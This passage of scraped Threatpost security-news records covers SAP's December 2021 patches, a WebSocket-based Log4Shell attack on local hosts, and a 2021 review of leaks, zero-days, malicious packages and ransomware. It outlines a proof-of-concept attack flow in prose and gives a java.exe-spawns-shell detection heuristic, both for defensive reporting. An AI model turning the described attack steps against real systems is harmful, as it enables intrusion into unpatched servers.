Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. 
He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the XStream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Side Request Forgery vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. 
\u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. 
The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. 
It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. 
Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T21:55:20", "description": "Defenders will once again be busy beavers this weekend: There\u2019s an alternative attack vector for the ubiquitous Log4j [vulnerability](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), which relies on a basic Javascript WebSocket connection to trigger remote code-execution 
(RCE) on servers locally, via drive-by compromise.\n\nIn other words, an exploit can affect services running as localhost in internal systems that are not exposed to any network.\n\nThat\u2019s according to researchers at Blumira, who noted that the discovery eviscerates the notion that Log4Shell attacks [are limited to](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) exposed vulnerable web servers.\n\n\u201cThis newly discovered attack vector means that anyone with a vulnerable Log4j version can be exploited through the path of a listening server on their machine, or local network through browsing to a website, and triggering the vulnerability,\u201d researchers said in a Friday note to Threatpost.\n\n* * *\n\n**Check out all of our Log4Shell coverage:**\n\n * [Relentless Log4j Attacks Include State Actors, Possible Worm](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>)\n * [What the Log4Shell Bug Means for SMBs: Experts Weigh In](<https://threatpost.com/log4shell-bug-smbs-experts/177021/>)\n * [How to Buy Precious Patching Time as Log4j Exploits Fly (Podcast)](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>)\n * [Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>)\n * _[Where the Latest Log4Shell Attacks Are Coming From](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>)_\n * [Log4Shell Is Spawning Even Nastier Mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)\n * [SAP Kicks Log4Shell Vulnerability Out of 20 Apps](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>)\n * [Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)\n\n* * *\n\nThis means there are several new malicious use cases for an exploit, beyond the now-well-documented ability 
to open a shell with a single line of code to drop malware on internet-facing web servers.\n\n\u201c[New use cases include everything] from malvertisting to creating watering holes for drive-by attacks,\u201d said Matthew Warner, CTO and co-founder of Blumira, in a technical post.\n\n## **Using WebSockets for Malicious Gain**\n\nWebSockets enables communication between a web browser and web applications, like chats and alerting on websites. They generally allow the browser to quickly send data back and forth to these types of apps, but they\u2019re also used for host-fingerprinting and port-scanning.\n\nWarner explained in his posting that WebSockets is also fraught with security risk.\n\n\u201cWebSockets are not restricted by same-origin policies like a normal cross-domain HTTP request,\u201d he explained. \u201cThey expect the server itself to validate the origin of the request. While they are useful, they also introduce a fair amount of risk as they do not include many security controls to limit their utilization.\u201d\n\nIn the Log4j case, an attacker would make malicious requests via WebSockets to a potentially vulnerable localhost or local network server. The targets don\u2019t have to be exposed to the internet.\n\n\u201cWebSockets have previously been used for port-scanning internal systems, but this represents one of the first remote code execution exploits being relayed by WebSockets,\u201d said Jake Williams, co-founder and CTO at BreachQuest, via email. \u201cThis shouldn\u2019t change anyone\u2019s position on vulnerability management though. 
Organizations should be pushing to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option.\u201d\n\n## **Local Attack Scenario for Log4Shell**\n\n_Warner offered a detailed breakdown of his proof-of-concept (PoC) for the attack in [the posting](<https://www.blumira.com/analysis-log4shell-local-trigger/>); below is a truncated explanation._\n\n**Step 1:** From a watering-hole server with the affected Log4j2 vulnerability installed, an attacker would trigger a file path URL from the browser with a WebSocket connection. Blumira used a basic Javascript WebSocket connection in the PoC, but Warner noted that \u201cthis does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.\u201d\n\n**Step 2:** As the page loads, it will initiate a local WebSocket connection, connect to the vulnerable listening server, and connect out over an identified type of connection based on a Java Naming and Directory Interface (JNDI) connection string \u2013 a technique that\u2019s similar to WebSockets\u2019 localhost port-scanning used for fingerprinting hosts.\n\n**Step 3:** Once the victim\u2019s host connects to an open port to a local service or a service accessible to the host itself, an attacker can then drop an exploit string in path or parameters. \u201cWhen this happens, the vulnerable host calls out to the exploit server, loads the attacker\u2019s class, and executes it with java.exe as the parent process,\u201d according to Warner.\n\n## **Detection and Remediation**\n\nThe bad news is that this is also a stealthy approach, according to the analysis: \u201cWebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.\u201d That\u2019s because WebSocket connections silently initiate when a webpage loads, with no direct control by the client itself. 
However, Warner noted that there are ways to get around this.\n\nTo detect a possible attack, Warner recommended looking for instances of \u201c.*/java.exe\u201d being used as the parent process for \u201ccmd.exe/powershell.exe.\u201d\n\n\u201cThis is potentially very noisy,\u201d Warner said.\n\nAnd finally, organizations should also make sure they\u2019re set up to detect the presence of Cobalt Strike, TrickBot and related common attacker tools.\n\nTo identify where Log4j is used within local environments, there are publicly available scanning scripts, researchers noted, to identify the libraries used locally. Here are two:\n\n * Windows PoSh \u2013 https://github.com/N-able/ScriptsAndAutomationPolicies/blob/master/Vulnerability%20-%20CVE-2021-44228%20(Log4j)/get-log4jrcevulnerability.ps1\n * Cross platform \u2013 https://github.com/hillu/local-log4j-vuln-scanner/releases\n\nTo mitigate the risk completely, organizations should update all local development efforts, internal applications and internet-facing environments to Log4j 2.16 ASAP, including any custom applications.\n\nIn the meantime, users can implement egress filtering, which can restrict the callback required for the actual exploit to land, and can use tools like [NoScript Java-blocker](<https://noscript.net/>) on untrusted external sites to avoid Javascript triggering WebSocket connections.\n\n\u201cThis news does mean that relying on web application firewalls, or other network defenses, is no longer an effective mitigation,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. 
\u201cPatching remains the single most important step an organization can take.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:43:43", "type": "threatpost", "title": "Brand-New Log4Shell Attack Vector Threatens Local Hosts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:43:43", "id": "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "href": "https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was 
all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. 
Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. 
Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j that could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry by researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. 
It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group using a never-before-seen zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE-2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. 
Readers flocked to the coverage of the issue.\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. 
Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The goal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. 
The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. 
The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breach the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. 
Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor in use by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the side effect, welcome from the attackers\u2019 point of view, of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. 
Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in Marvel\u2019s X-Men comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as a result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent of gamers surveyed reported suffering foul play such as ID theft, scams or the hack of in-game valuables. 
Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique itself is not new, but using Steam profiles as attacker-controlled hosting sites is, and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. 
They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Steam gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. 
